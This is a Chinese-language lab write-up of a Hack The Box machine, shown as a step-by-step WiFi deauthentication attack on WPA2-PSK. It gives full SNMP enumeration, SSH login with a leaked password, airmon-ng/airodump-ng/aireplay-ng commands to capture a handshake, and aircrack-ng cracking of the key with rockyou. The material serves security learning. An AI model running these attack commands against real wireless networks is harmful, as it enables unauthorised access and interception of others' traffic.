WiFi Hack | DeAuthentication Attack
WiFi Hack | DeAuth Attack
免责声明:本次攻击为HTB下的虚拟场景,仅作为教学目的,请勿在未经允许的情况下实施此类攻击,违者后果自负;本次演示在虚拟环境中,无敏感信息,仅保留关键步骤及理论,其余部分做删减处理.
写在前面(正文请查看DeAuth)
这是一篇关于WIFI攻击的文章,起因是我在做Hackthebox的AirTouch机器过程中,学习到的一些WIFI攻击技术,我看社区内更多内容是偏Web,似乎还没有类似的分享,所以来分享一下我学到的WIFI攻击技术,也算是丰富一下社区内容的多样性。这次分享的是针对WPA2-PSK的DeAuthentication Attack, 不是很新的技术,江湖里的大佬太多了,各位大佬们轻喷:)
后续可能还会更新一篇针对高安全性的EAP-TLS认证的攻击,这也是企业级的WIFI、VPN认证协议,是一种基于证书的认证;以及Evil Twin这种针对WIFI的中间人攻击,这些都是在做AirTouch中学到的,因为我本身并不是专门研究WIFI攻击,相对而言我更了解的还是WEB和Windows域,所以可能说的不是非常清楚,师傅们多多包涵:)
WPA/WPA2-PSK
WPA2-PSK是个人用WIFI中非常常见的认证协议,相比于最早的WEP使用RC4加密算法和IV进行认证,WPA2-PSK已经使用了AES加密算法,相对而言安全性更高,如果你现在打开你的手机,查看你连接的WIFI,在安全性中很可能显示的是WPA/WPA2 PSK.
DeAuth
针对WPA-PSK,基本都是通过暴力破解密钥的方式进行攻击,如爆破pin码,PMKID等等,相对而言Deauthentication Attack会稍微复杂一些,这种攻击方式实际上是通过Dos+捕捉WPA握手流量+暴力破解,从而接管WIFI网络.
本次的攻击将演示,通过SNMP泄露,成功登录到主机,再通过Deauthentication攻击进入内部WIFI网络.
Step1: SNMP Leaking
snmpwalk -v2c -c public 10.129.25.155
iso.3.6.1.2.1.1.1.0 = STRING: "\"The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)\""
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (54112) 0:09:01.12
iso.3.6.1.2.1.1.4.0 = STRING: "admin@AirTouch.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "Consultant"
iso.3.6.1.2.1.1.6.0 = STRING: "\"Consultant pc\""
ssh consultant@10.129.25.155
RxBlZhLmOkacNWScmZ6D
Step2: Set up to Monitor mode
运行ip addr能看到靶机给了多个虚拟无线网卡,首先设置其中的一个为监控模式,一般情况下,WIFI网卡多为Manager模式,作为网络的参与者,会进行连接AP,获取IP,收发数据等,但无法监控其他WIFI信道.
airmon-ng start wlan0
此时wlan0被重命名为wlan0mon,并且已经设置为监听模式.
iw wlan0mon info
Interface wlan0mon
ifindex 5
wdev 0x4
addr 02:00:00:00:00:00
type monitor
wiphy 0
channel 10 (2457 MHz), width: 20 MHz (no HT), center1: 2457 MHz
txpower 20.00 dBm
Step3: List Network
通过airodump-ng列出所有监听到的WIFI,其中需要留意的是BSSID, ESSID以及CH,这些参数用来确定唯一的WIFI
airodump-ng wlan0mon

- ESSID:WiFi的名称,用于方便人辨别WIFI
- BSSID:AP的MAC地址
- CH:当前WIFI所处的信道
Step4: capture specific network
设置仅抓取AirTouch-Internet的流量,输出到psk_handshake文件中,之后在开启一个新的ssh会话,执行aireplay.
airodump-ng --bssid F0:9F:C2:A3:F1:A7 -c 6 wlan0mon -w psk_handshake
Step5: Deauthenticate
在新的SSH会话中发送Deauthentication frames给AirTouch-Internet
aireplay-ng --deauth 10 -a F0:9F:C2:A3:F1:A7 -c 28:6C:07:FE:A3:22 wlan0mon

Step6: Crack the key
在成功发送Deauth frames之后,通过Aircrack-ng破解key
aircrack-ng -w eaphammer/wordlists/rockyou.txt psk_handshake-01.cap

Step7: Import key
之后可以将key导入到wireshark中,这样可以查看明文的流量,或者使用wpa_passphrase生成配置文件,从而连接到无线网络中.
连接到AirTouch-Internet
wpa_passphrase "AirTouch-Internet" "challenge" > /tmp/config.conf
wpa_supplicant -i wlan1 -c /tmp/config.conf
# 设置通过DHCP自动获取IP
dhclient wlan1
此时能看到wlan1已经获得了IP.
root@AirTouch-Consultant:~# ip addr show wlan1
8: wlan1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff
inet 192.168.3.23/24 brd 192.168.3.255 scope global dynamic wlan1
valid_lft 86384sec preferred_lft 86384sec
inet6 fe80::ff:fe00:100/64 scope link
valid_lft forever preferred_lft forever
导入到wireshark
打开wireshark,选择左上角Edit->点击最下方的Preferences->Protocols->下拉选择到IEEE 802.11->Decryption Keys->Edit...,点击下方的+号,输入:
Key type: wpa-pwd
Key:challenge:AirTouch-Internet
此时在wireshark的Filter中输入HTTP,能看到已经解密的明文HTTP流量.
总结
需要用到的工具有:
airmon-ng
airodump-ng
aireplay-ng
aircrack-ng
iw
攻击流程:
首先设置一张网卡为监听模式->列出所有监听到的网络->指定要攻击的网络并抓取流量->发送Deauthentication frames->破解Key->导入key
TIP: 一般的网卡都不支持Monitor模式,WIFI攻击需要专用网卡.
写在最后
后续可能会更新一些windows域控以及Kerberos相关的内容,毕竟WIFI Hack不是我最熟悉的内容,如果各位师傅们有具体想看的内容或者有想交流的内容,请直接在评论中留言即可,感谢各位师傅:)
通过下方的链接注册HTB,一起薅羊毛:)
https://referral.hackthebox.com/mzG7dg8
My keybase:
d10n3
温馨提示:本文内容仅用于合法授权的安全学习与研究交流,严禁用于未授权渗透测试、漏洞利用或任何违法行为。
涉及企业或平台的未公开漏洞信息,请遵循负责任披露原则,勿公开传播可直接复现的敏感细节。
如存在侵权、错误信息或不当内容,请联系站方处理,我们将及时核实并删除。邮箱:admin@baimaojianghu.com。
